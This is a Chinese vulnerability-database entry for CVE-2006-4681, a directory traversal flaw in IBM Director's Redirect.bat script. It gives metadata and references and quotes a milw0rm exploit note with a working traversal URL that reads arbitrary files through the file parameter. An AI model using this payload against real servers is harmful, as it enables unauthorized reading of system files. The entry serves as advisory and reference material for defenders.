IBM Director 'Redirect.bat'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110976 漏洞类型 路径遍历
发布时间 2006-09-07 更新时间 2006-09-11
CVE编号 CVE-2006-4681 CNNVD-ID CNNVD-200609-143
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2320
https://www.securityfocus.com/bid/84143
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-143
|漏洞详情
IBMDirector是行业领先的Intel架构系统远程工作组系统管理软件。IBMDirector自带的脚本在处理用户参数时存在输入验证漏洞,远程攻击者可能利用此漏洞非授权获取文件内容。IBMDirector的Redirect.bat文件中没有正确的过滤对file参数的输入,允许攻击者通过目录遍历攻击泄漏任意文件的内容。
|漏洞EXP
There is a vulnerability within the Redirect.bat file on a ibm director
cgi which allows a directory transversal to take place which in turn
exposes most files on the system to be read without authorization.

http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here)


This was fixed in the 5.10 version of ibm director.

-Daniel Clemens

# milw0rm.com [2006-09-07]
|受影响的产品
IBM Director 3.1
|参考资料

来源:BID
名称:19898
链接:http://www.securityfocus.com/bid/19898
来源:VUPEN
名称:ADV-2006-3532
链接:http://www.frsirt.com/english/advisories/2006/3532
来源:SECTRACK
名称:1016815
链接:http://securitytracker.com/id?1016815
来源:SECUNIA
名称:21802
链接:http://secunia.com/advisories/21802
来源:MILW0RM
名称:2320
链接:http://milw0rm.com/exploits/2320
来源:AIXAPAR
名称:IC46281
链接:ftp://ftp.software.ibm.com/pc/pccbbs/pc_servers_pdf/dir5.10_docs_relnotes.pdf
来源:XF
名称:ibm-director-redirect-directory-traversal(28836)
链接:http://xforce.iss.net/xforce/xfdb/28836